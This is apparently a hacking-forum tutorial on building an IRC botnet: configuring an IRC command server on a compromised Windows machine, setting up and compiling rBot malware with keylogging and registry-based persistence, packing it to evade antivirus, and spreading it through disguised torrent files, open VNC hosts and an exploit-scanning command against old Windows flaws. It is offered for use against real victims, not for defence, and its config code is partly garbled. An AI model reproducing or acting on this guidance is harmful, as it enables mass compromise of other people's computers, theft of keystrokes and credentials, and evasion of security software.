The tutorial includes how to install a ircd, how to compile a bot & ways to spread.
“Chapters”
1. What is needed
2. How to configure an (unreal)ircd
3. How to compile your bot
4. Make your exe UD
5. Ways of spreading.
Before I begin, my english isn’t 100% good, i’ll try to translate everything as good as possible, sorry for false lines or words.
1. What is needed
There are many things which are needed for creating a botnet. I’ll make a list of stuff which is needed for botnets and explain why they are needed.
– Visual Studio 6.0 (
Code:
http://www.raptorcash.com/vb6/ms%20v…20more)(1).zip
– Visual Studio 6 Service Pack 5 (
Code:
Download
)
– Visual Studio 6.0 Processor Pack (
Code:
Download
)
– Core SDK (
Code:
Download
, Safe them somewhere do cmd, cd Directory\of\file and use psdk-full Directory\of\output)
For a tutorial to install all the things up here go to
Code:
http://www.ryan1918.com/viewtopic.php?t=1509
– a rooted windows box (Linux can be done also but im telling about windows)
– a ircd (There are some at this forum search yourself)
– a botsource (I used rBot for example, find some old ones here:
Code:
http://securitydot.net/exploits/index.php?dir=bots/
Well that was it I think?
2. How to configure an (unreal)ircd
Most ircd’s are really easy to configurate, especially modded ones. Most of the times you only have to edit the name, the authost, the ircd port & the admin user&pass. What do we have to edit:
Code:
oper your-choosen-username { // Edit your choosen name to a username you want
from {
userhost “yourname@*”; // Edit your name to your emailaddres
};
password “your-choosen-pass”; // Edit your choosen pass to a password you want
class “default”;
flags {
netadmin;
services-admin;
global;
helpop;
can_rehash
can_globalnotice;
can_globalroute;
can_globops;
can_wallops;
can_unkline;
can_kline;
can_globalkill;
can_zline;
can_gkline;
can_gzline;
get_umodew;
get_host;
can_override;
can_die;
can_restart;
};
};
Edit the flags here above, if you want to add more ircds owners just copy paste this shit
Code:
me { name “QuakeNet”; info “QuakeNet”; numeric 1; };
Here is the Server name, name can be “irc.QuakeNet.org”, information is just some info 😉
Code:
listen        *:6667;
easily edit the port to a port which is open, most ports from 6500 -> 7000 are open
Some extra things to edit
Code:
hosts {
local   “QuakeNet”;
global     “QuakeNet”;
coadmin    “QuakeNet”;
admin   “QuakeNet”;
servicesadmin “QuakeNet”;
netadmin   “QuakeNet”;
host-on-oper-up “yes”;
};
};
The sethost’s you get if you oper, like [email protected] / [email protected].
And just put “no” in host-on-oper-up if you don’t want to get an auto-host selected.
Code:
restrict-channelmodes “ntsuom”;
modes-on-join “+Mustm”;
Edit this to your own options to make your channel secure for you
Now just safe the cfg, and your done with the config. Rar the files and uplaod it to somewhere. What you gotta do now is open a windows box (on vnc??) and download the files and place them in a secure folder, like C:\Windows\????. then just run the exe which allows to start the ircd, or run the batch file which is most there in the modded ircds, you’ll see the ircd is running. Don’t forget to set a password on the VNC so no-one can catch your oper user&pass, secure all the ports so your botnet don’t get sniffed.
Were done with this one now too.
3. How to compile your bot
You probally found a rBot source you like by now, in the url I gave you there were many sources, I’ve picked a rBot, which is a good bot to start with since it got all standard functions & scanners and it’s the easiest bot. ill copy and paste the config and will explain what to do.
Code:
// bot configuration (generic) – doesn’t need to be encrypted
int port = 6667;
int port2 = 6667;
int socks4port = 8001;
int tftpport = 69;
int httpport = 5465;
int rloginport = 514;
BOOL topiccmd = TRUE;
BOOL rndfilename = FALSE;
BOOL AutoStart = TRUE;
char prefix = ‘.’;
int maxrand = 8;
int nicktype = CONSTNICK;
BOOL nickprefix = FALSE;
#ifdef DEBUG_LOGGING
char logfile[]=”%temp%\\yas.jpg”;
#endif
#ifndef NO_CRYPT // Only use encrypted strings or your binary will not be secure!!
#else // Recommended to use this only for Crypt() setup, this is unsecure.
char botid[] = “rx-asn-2-re-worked”;
char version[] = “v2 by ovelayer”;
char password[] = “yourpass”;
char server[] = “”;
char serverpass[] = “”;
char channel[] = “#”;
char chanpass[] = “”;rd
char server2[] = “”
char channel2[] = “#”;
char chanpass2[] = “”;
char filename[] = “yourfile.exe”;
char keylogfile[] = “keylog.xml”l
char valuename[] = “”;
char nickconst[] = “rBot|”;
char szLocalPayloadFile[]=”yourfile.exe”;
char modeonconn[] = “-xi+B”;
char exploitchan[] = “#*”;
char keylogchan[] = “#*”;
char psniffchan[] = “#*”;
char *authost[] = {
“[email protected]”
};
char *versionlist[] = {
“mIRC v6.12 Khaled Mardam-Bey”,
};
char regkey1[]=”Software\\Microsoft\\Windows\\CurrentVersion\\Run”;
char regkey2[]=”Software\\Microsoft\\Windows\\CurrentVersion\\RunServices”;
char regkey3[]=”Software\\Microsoft\\OLE”;
char regkey4[]=”SYSTEM\\CurrentControlSet\\Control\\Lsa”;
#endif
#ifdef PLAIN_CRYPT
char key[16] = “39lwmmqopma24ik1”; // CHANGE THIS!!! hmmm..Do I even need this now?
#endif
1. Change the port to the port of your ircd, normally it’s 6667, if you got else, just change them.
2. Change the prefix, normally its “.”, thats what you have to use before the command so like “.login yourpass”.
3. the password, change it to login to your bot “.login unknownpass”
4. the serverpassword, probally you ain’t got one but if so edit there.
5. the server, add your IP/DNS There.
6. Your channel, edit your channel where the bots got to join.
7. Your chanpass, change it to be more secure.
8. leave the server 2 of rbot, cuz the code of that thing doesn’t work.
9. Change the filename so it won’t get killed easily by a user because it’s a suspicious virus.
10. the file where the computers puts his keylog shit in, not needed actually.
11. value name, so if your exe is called nod32, then the valuename = Nod32 AntiVirus or something
12. nickconst is the prefix before a bot. like rBot|12312312
13. the modes on connect, you can leave that as it is.
14. exploit channel, if the bot is spreading it will leave it exploit message’s there.
15. The keylog & psniff channel, it will send the pstore & keylog messages, but PSNIFF isn’t working in rBot so ~censored~ that
16. The authost, you can set your authost like g7onic@*, that will require you to have a nicname with all hosts, you can set *@anonym0us.eu, that will require you to have your host set like anonym0us.eu and you have to most secure one: [email protected] this requires you the nickname & the host!.
17. Leave the rest as it is.
Ask for questions, but I think this help you out.
4. Make your exe UD.
Before you start with everything you got to secure your exe, there are packers for, it’s hard to get a good packer at this moment, but you can use some public ones which make you exe detected for nod32, kasperspy etc (the big antivirus company’s). Your file got to be small so it’s easy to spread to other rooted boxes, but also undetected, otherwise a antivirus detect it.
5. Ways of spreading
Their are many different types of spreading, you need bots to start with before you can spread via exploits which are in your bots. There are different ways to get your bots, you can easily ask a mate to let his bots download some bots to your exe which allows you to start a bnet, but you can also spread via torrent just make a torrent with a movie and your exe as “codec” or something, or scan for some vnc’s and infect them easily opening ie and open exe (REMOVE HISTORY!).
If you got some bots ( upper 30 bots ) you can start spreading, your bots have different types of exploits in it, asn1smb, lsass, dcom and all standard exploits, Since these are old they won’t spread fast, but some of them still work okay on the right range. the standard command to scan with your bots is .advscan exploit <Threads> <seconds> <delay> ip range <flags (use -b-r) so like .advscan asn1smb 80 5 0 255.255.x.x -b -r.
by Anonymous